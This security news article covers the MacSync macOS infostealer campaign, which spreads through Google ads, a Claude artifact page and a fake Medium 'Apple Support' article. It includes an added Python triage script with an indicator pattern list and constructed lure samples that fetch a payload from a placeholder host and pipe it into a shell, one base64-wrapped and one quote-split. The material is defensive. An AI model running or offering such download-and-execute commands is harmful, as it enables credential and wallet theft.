A large-scale macOS malware campaign is spreading through sponsored Google search results and trusted online platforms. More than 15,000 users have already been exposed to the malicious content, making this one of the more concerning threats currently affecting Mac users.
The attackers are distributing a data-stealing program known as MacSync. Instead of using suspicious emails or fake downloads, the campaign relies on professional-looking guides published on legitimate platforms. The goal is simple: convince users to run harmful commands on their own computers.
Security analysts have identified two main variants of the attack. Both use social engineering tactics designed to trick users into believing they are performing safe system tasks.
Sponsored Search Results Lead to Fake macOS Security Guide
In the first variant, users searching for “Online DNS resolver” on Google are shown a sponsored advertisement at the top of the results page. The ad redirects them to a public page hosted using Claude AI’s artifact feature.
The page is titled “macOS Secure Command Execution” and appears to offer a technical guide for safely running commands. The content looks structured and professional, which increases trust.
However, the guide instructs users to copy and paste a base64-encoded command into the macOS Terminal application. The instructions claim the command enhances security. In reality, it downloads a malicious file into the system’s temporary folder under the name osalogging.zip.
Once executed, the file installs a loader for MacSync malware. The malware then connects to a remote command-and-control server. It uses a hardcoded authentication token and API key while pretending to be a normal macOS browser by spoofing its user-agent string.
The server sends instructions back to the infected system. These instructions are passed directly to osascript, Apple’s scripting utility, which carries out the data theft.
MacSync searches the device for sensitive information. It targets saved passwords in the macOS Keychain, browser data, login credentials, and cryptocurrency wallet files.
The stolen data is compressed into a zip archive and uploaded using HTTP POST requests. If the file size is large, the malware divides it into smaller parts and retries failed uploads multiple times using an exponential delay system. After completing the transfer, it deletes temporary files to reduce traces of its activity.
Fake Medium Article Delivers Obfuscated ClickFix Attack
The second variant focuses on users searching for “macOS CLI disk space analyzer.” Instead of a Claude artifact, this method directs users to a fraudulent Medium article.
The article claims to be written by an official Apple Support Team. It provides instructions that appear helpful and technical, guiding users through disk space analysis commands.
This version also uses the ClickFix social engineering technique. ClickFix tricks users into manually executing commands under the belief that they are fixing or optimizing their system.
The malicious command in this variant is more heavily disguised. The attackers break up recognizable keywords to bypass basic detection tools. For example, instead of writing "curl" normally, they use a split format such as cur""l; because the shell joins adjacent strings before running a command, cur""l still executes as curl, but a simple keyword match on the pasted text no longer sees it.
When executed, the command retrieves a malicious payload. The payload installs the same MacSync information stealer used in the first variant.
Like the Claude-based method, this attack hides behind a trusted platform. The layout and branding of the Medium page make the content look authentic, increasing the likelihood that users will follow the instructions without suspicion.
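Both lures end with the same step: a user pastes a command that has been wrapped in base64 (first variant) or quote-split (second variant) into Terminal. The following is an added example written for this page, not code from the article or from any vendor it cites, showing how a clipboard or help-desk triage script can undo those two evasions and then match the indicators the article names (curl, osascript, the temporary folder, a .zip payload, a pipe into a shell). The indicator list, the sample commands and the example.invalid URL are constructed for the example and are not artifacts from the campaign.

```python
"""Triage helper for "paste this into Terminal" instructions (added example).

It undoes the two evasions the article describes (keyword splitting such as
cur""l and base64-wrapped commands), then looks for indicators of the
MacSync lure. Indicator list and sample commands are constructed here.
"""
import base64
import re

# Name -> pattern. Matching is done on the de-obfuscated text, never on the raw paste.
INDICATORS = [
    ("curl", re.compile(r"\bcurl\b")),
    ("osascript", re.compile(r"\bosascript\b")),
    ("base64", re.compile(r"\bbase64\b")),
    ("tmp_dir", re.compile(r"/tmp/|\$TMPDIR")),
    ("zip_payload", re.compile(r"\.zip\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(ba|z)?sh\b")),
    ("shell_dash_c", re.compile(r"\b(ba|z)?sh\s+-c\b")),
]

# Empty quote pairs inserted mid-token ("" or '') and a backslash before a letter
# are the cheap splitting tricks; removing them restores the original keyword.
_EMPTY_QUOTES = re.compile(r"\"\"|''")
_ESCAPED_LETTER = re.compile(r"\\([A-Za-z])")


def normalize(cmd: str) -> str:
    """Collapse quote-splitting so the text reads as the shell would execute it."""
    return _ESCAPED_LETTER.sub(r"\1", _EMPTY_QUOTES.sub("", cmd))


_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_fragments(text: str) -> list[str]:
    """Decode every long base64-looking token that yields printable text."""
    found = []
    for m in _B64_TOKEN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # random-looking identifiers are not valid base64 text
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            found.append(decoded)
    return found


def assess(cmd: str) -> dict:
    """Return the de-obfuscated layers, indicator hits and a verdict for one pasted command."""
    layers = [normalize(cmd)]
    # One decoding pass covers the lures described; a decoded layer is normalized
    # again in case it is itself quote-split.
    for inner in decode_base64_fragments(layers[0]):
        layers.append(normalize(inner))
    hits = sorted({name for layer in layers for name, rx in INDICATORS if rx.search(layer)})
    obfuscated = layers[0] != cmd or len(layers) > 1
    return {
        "layers": layers,
        "indicators": hits,
        "obfuscated": obfuscated,
        # Obfuscation plus any indicator, or several indicators on their own, is worth stopping on.
        "suspicious": (obfuscated and bool(hits)) or len(hits) >= 3,
    }


# Constructed samples: example.invalid is a reserved placeholder, not a real host.
INNER_COMMAND = "curl -s https://example.invalid/a -o /tmp/osalogging.zip"
SAMPLES = {
    "variant1_base64": "echo " + base64.b64encode(INNER_COMMAND.encode()).decode() + " | base64 -d | bash",
    "variant2_split": 'cur""l -fsSL https://example.invalid/b | s""h',
    "benign_df": "df -h /",
    "benign_du": "du -sh ~/Library/* | sort -h | tail -n 20",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        r = assess(cmd)
        print(f"{label:16} suspicious={r['suspicious']!s:5} indicators={r['indicators']}")
```

The "obfuscated" flag alone is deliberately not a verdict: a legitimate `printf 'a\nb'` also trips the backslash rule, which is why the script only escalates when de-obfuscation reveals one of the named indicators, or when several indicators appear in the clear. Run the file directly to see the two constructed lures flagged and the two disk-usage commands pass.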
MacSync Malware Targets Passwords, Browsers, and Crypto Wallets
MacSync is specifically built to collect sensitive macOS data. After installation, it scans the system for stored credentials and financial information.
It extracts passwords from the Keychain, collects browser cookies and autofill data, and searches for cryptocurrency wallet files stored locally. This information can allow attackers to access accounts without immediate detection.
The malware uses secure-looking network communication methods and cleanup routines to make analysis harder. It disguises traffic as legitimate browser activity and removes temporary files once data transfer is complete.
By combining Google Ads, AI-generated artifacts, and trusted blogging platforms, the attackers have created a distribution method that appears legitimate at first glance. Sponsored search placements increase visibility, while familiar websites lower user suspicion.
The campaign demonstrates how malware operators are shifting tactics. Instead of relying solely on phishing emails, they are embedding malicious instructions into content that looks educational and helpful.
More than 15,000 users have already encountered the malicious pages linked to this operation. The campaign shows how easily trusted digital platforms can be misused to distribute macOS malware and steal sensitive information.
